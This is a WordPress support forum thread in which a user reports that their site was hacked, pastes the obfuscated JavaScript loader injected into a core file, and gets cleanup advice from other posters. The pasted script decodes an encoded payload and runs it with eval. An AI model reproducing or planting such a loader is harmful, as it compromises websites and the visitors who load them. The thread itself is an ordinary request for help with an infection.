Support » Fixing WordPress » Help…My Site was Hacked?

  • Hi Guys

    I just started using wordpress and when I visited my site today, it said there was a syntax error loading wp-admin/includes/template.php on line 3275.

    I reloaded my site, and my virus scanner brought up this virus\?119595dcb6e

    I checked the code on line 3275 and found that 3 lines were added to the original wordpress code. And at the end of </script> it shows <!– –> which is another website i have wordpress on!

    If you can help me figure out what’s wrong that’d be great. Thanks guys

    <script language=JavaScript>function xb3b23(x) { var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,0,7,59,18,19,15,14,16,39,0,0,0,0,0,0,58,54,26,20,6,23,30,46,52,8,38,24,55,33,56,57,28,32,25,42,62,10,4,43,17,50,12,0,0,0,0,41,0,40,29,45,1,48,49,47,22,34,53,37,61,60,9,35,3,2,27,51,36,5,21,44,11,13,31);for(g=Math.ceil(y/c);g>0;g–){q=”;for(z=Math.min(y,c);z>0;z–,y–){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(197^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}xb3b23(‘YY@SMSSwWrrwtDxwAigNdS@SQUG0MSS_eiUaWD3@YFxWfqB3i96WoFx_aqBOW4USQi0a94SmJhGcLBUT9LBwfh30SWF0tDBawDxWSG@@SFWaS2W@@xG3I4BwcGTcSq3SMA7itDrWWzx_WDSSaA73gz6ll50mw3GNoFU_YrSNGxTOkxxWMDrWNrzlAEFWQYSacDxTYzzOADxg_qUT92UWAhrStY30WS@SQFTTOW7WoFx_aq@Tis7’)</script><!– –>

Viewing 2 replies - 1 through 2 (of 2 total)
  • Hi,

    Did you get anywhere with this?
    I too am getting similar virus alerts.

    I will be upgrading to 2.7.1 does anyone know if this sorts the problem?

    Also what are the permissions on your files?



    I’m not currently a WordPress user, but I can tell you that your web host has been intruded like many, many others. You should contact your hosting company. You need to remove the offending item from your source file and re-do everything.

    It happened to me (I’m with and all my index.htm and home.htm files were infected, both with something very similar to the script you describe and with an extraneous <form> entry. I also had an infection in my cgi-bin directory which I had to remove manually. I was able to clear all the rest by uploading fresh copies of all infected files from my local backup, but that may not be much help to you?

    Note that you can submit the script to and it will ‘de-obfuscate’ it for you – then you’ll see where 8addition came from!

    Hope this helps

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Help…My Site was Hacked?’ is closed to new replies.